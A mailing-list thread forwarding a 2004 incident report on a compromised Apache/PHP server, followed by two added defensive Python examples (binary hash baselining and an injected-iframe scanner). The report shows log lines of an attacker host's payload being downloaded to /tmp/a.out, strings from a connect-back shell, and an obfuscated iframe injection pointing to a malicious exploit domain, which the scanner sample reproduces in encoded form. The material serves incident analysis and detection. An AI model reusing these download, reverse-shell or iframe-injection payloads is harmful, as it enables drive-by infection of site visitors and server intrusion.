[Owasp-dotnet] (interesting analysis of a Web Server Attack on Apache) [Fwd: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild]
michaels at phg.com.au
Sun Oct 24 19:17:57 EDT 2004
But what would the checksum check? All the attacker needs to do is
put something in the registry and link it to his program which does all
the work ... you can't use the registry in the sum as that would be too
different ... maybe you could include some common keys which could be
used for autostarting programs, etc ... but IIRC there are many ways to
autostart a program, not only the reg.
Perhaps an interesting angle would be to set up a monitoring system
around tools like filemon and regmon and note changes to
interesting locations. Of course, an attacker could simply shut down
these tools (or, if serving out information to a remote source, fake the
output) so it's not perfect, but could be interesting ... and if the
tool was shut down it would indicate an attack and the entire server
could be shut down to prevent too much damage occurring ...
 filemon - http://www.sysinternals.com/ntw2k/source/filemon.shtml
 regmon - http://www.sysinternals.com/ntw2k/source/regmon.shtml
From: Dinis Cruz [mailto:dinis at ddplus.net]
Sent: Sunday, 24 October 2004 10:35 PM
To: owasp-dotnet at lists.sourceforge.net
Cc: eflorio at edmaster.it
Subject: [Owasp-dotnet] (interesting analysis of a Web Server Attack on
Apache) [Fwd: [Full-Disclosure] xpire.info & splitinfinity.info -
exploits in the wild]
See below a post made today by Elia Florio on the Full Disclosure
This is the kind of attacks that I am worried about given the current
insecure Full Trust Asp.Net world (you wouldn't need an exploit, only a
The other interesting issue is the Rootkit scenario and the types of
attacks that are possible when the Malicious Hacker changes the behavior
of the underlying OS or Web Server.
I also like the idea of being able to check the md5sum of the core OS
and Web Server. But how can it be done at the moment since there is no
support from Microsoft (i.e. tools and a 'secure' location with updated
md5sums of Microsoft's products?)
-------- Original Message --------
Subject: [Full-Disclosure] xpire.info & splitinfinity.info -
exploits in the wild
Date: Sun, 24 Oct 2004 13:47:04 +0200
From: Elia Florio <eflorio at edmaster.it>
To: <full-disclosure at lists.netsys.com>
I'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
On this host a special trojan is now installed that inserts a
malicious <IFRAME> tag into every served .PHP page.
The host is running these services:
Port 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Port 22: SSH-1.99-OpenSSH_3.4p1
Port 25: 220 XXXXX ESMTP 5.5.1
Port 110: +OK <XXXX at XXXXXX>
Port 3306: MySQL 3.23.52
Ports 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
I've found in the Apache log that the hacker broke into the machine
using an overflow and injected an executable /tmp/a.out via
These are the suspicious log lines:
[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S.
<angdimar at yahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowski at libero.it
sh: -c: option requires an argument
Resolving xpire.info... fatto.
Connecting to xpire.info[22.214.171.124]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]
0K .......... ........ 100% 9.97K
15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal
Trying a WGET of http://xpire.info/cli.gz, I get an ELF executable for
possibly containing a ConnectBack shell. Inside this ELF file you can
Usage: %s host port
pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i
fork pty, bye!
Fuck you so
/bin/sh No connect
Looking up %s... Failed!
%u Connect Back
I don't know if the hacker installed a rootkit on this machine, but the
of md5sum of
ls, lsof, ps, netstat binaries with other ones from a clean Mandrake
The main problem is finding how the Apache Server (or PHP) was altered,
because every user that connects to this host now could be infected by
several recent HTML/IE exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in
The script is:
Decoding it, I see that it writes an <IFRAME> tag into the page
pointing to this URL:
<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
If you surf to this page (don't do this if you use IE or are not
you could get infected
by several exploits, because it opens a lot of <iframe>s pointing out to
I would like to list these domains here, because they are sources
for exploit studying:
Found Java class exploit
My questions are:
httpd.conf and a lot of PHP pages,
but I didn't find anything..... Is it possible that the hacker installed
a compromised Apache module ..so???
2) Does anyone know these sites (xpire.info or splitinfinity.info) from before?
Why are they still online and serving trojans/exploits to surfers
xpire.info is related to "Mike Fox"..... but it sounds like a fake John Doe
Domain ID: D5946452-LRMS
Domain Name: XPIRE.INFO
Created On: 23-May-2004 19:41:15 UTC
Last Updated On: 02-Aug-2004 08:07:20 UTC
Expiration Date: 23-May-2005 19:41:15 UTC
Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a
Registrant ID: C4752858-LRMS
Registrant Name: Mike Fox
Registrant Organization: n/a
Registrant Street1: Hali-gali, 77
Registrant City: Deli
Registrant Postal Code: 12345
Registrant Country: IN
Registrant Phone: +91.226370256
Registrant Email: c8idkvtgarwinidkvt38 at yahoo.com
3) How can I tell if a rootkit was installed???
Thanks to anyone who replies
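Three posters in this thread reach for the same defensive idea: record the md5sums of the core OS and Web Server (Dinis), or of ls, lsof, ps and netstat (Elia), on a clean system and compare later. The block below is an added example, not code from the thread or any of its authors: a baseline/verify routine using SHA-256 in place of MD5, run against constructed stand-in files in a temporary directory; the manifest should be kept off-host and the check run from trusted boot media, since a kernel rootkit or an attacker stopping the tool (michaels' point) can defeat an on-host check.

```python
# Added example (not from the thread): baseline and verify digests of core
# binaries, as the posters describe, using SHA-256 in place of MD5.
import hashlib
import tempfile
from pathlib import Path

CORE_BINARIES = ["ls", "lsof", "ps", "netstat"]  # the set named in the post

def hash_file(path: Path, chunk: int = 65536) -> str:
    """Stream the file through SHA-256 so large binaries need little memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(root: Path, names) -> dict:
    """Manifest {name: digest}; take it on a known-clean install, store off-host."""
    return {name: hash_file(root / name) for name in names}

def verify(root: Path, baseline: dict) -> dict:
    """Compare live files against the manifest; sorted so output is stable."""
    report = {"ok": [], "modified": [], "missing": []}
    for name, digest in sorted(baseline.items()):
        target = root / name
        if not target.exists():
            report["missing"].append(name)
        elif hash_file(target) != digest:
            report["modified"].append(name)
        else:
            report["ok"].append(name)
    return report

def demo() -> dict:
    """Constructed stand-in for /bin: baseline it, then simulate a rootkit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name in CORE_BINARIES:
            (root / name).write_bytes(b"clean " + name.encode())
        baseline = build_baseline(root, CORE_BINARIES)
        (root / "ps").write_bytes(b"trojaned ps")  # replaced binary
        (root / "lsof").unlink()                    # removed binary
        return verify(root, baseline)
```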
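Elia's core finding is an <IFRAME> written into served pages by an obfuscated script, pointing off-site and sized to one pixel. The block below is an added example, not code from the post: it scans a captured response body for iframes that are off-site or near-invisible, and percent-decodes inline scripts that call unescape()/document.write() to catch a tag that is only emitted at render time. The served hostname www.victim.example and the sample page are constructed.

```python
# Added example (not from the post): flag injected <iframe> tags in a served
# page, including ones written by a script via unescape()/document.write().
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

class PageScanner(HTMLParser):  # collects <iframe> attrs and inline <script> bodies
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        self._in_script = self._in_script or tag == "script"
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def is_tiny(value: str) -> bool:
    # A 1-2 pixel frame is meant to be invisible, like the post's height=1.
    try:
        return int(value.strip().rstrip("px")) <= 2
    except ValueError:
        return False

def judge(attrs: dict, served_host: str):
    src = attrs.get("src", "")
    host = urlparse(src).hostname or served_host  # relative src = same host
    reasons = []
    if host != served_host:
        reasons.append("off-site src: " + host)
    if is_tiny(attrs.get("height", "")) or is_tiny(attrs.get("width", "")):
        reasons.append("near-invisible size")
    return (src, reasons) if reasons else None

def suspicious_iframes(html: str, served_host: str) -> list:
    page = PageScanner()
    page.feed(html)
    candidates = list(page.iframes)
    for js in page.scripts:  # the post's tag was emitted by an obfuscated
        decoded = PageScanner()  # script: percent-decode it and scan its output
        decoded.feed(unquote(js))
        candidates += decoded.iframes
    return [hit for hit in (judge(a, served_host) for a in candidates) if hit]

SAMPLE_PAGE = """<html><body><h1>News</h1>
<iframe src="/news/ticker.php" width="400" height="60"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%27http%3A%2F%2Fwww.splitinfinity.info%2Ffa%2F%3Fd%3Dget%27%20height%3D1%20width%3D1%3E%3C%2Fiframe%3E'))</script>
</body></html>"""  # constructed sample: one legitimate frame, one injected by script

def scan_sample() -> list:
    return suspicious_iframes(SAMPLE_PAGE, "www.victim.example")  # hypothetical host
```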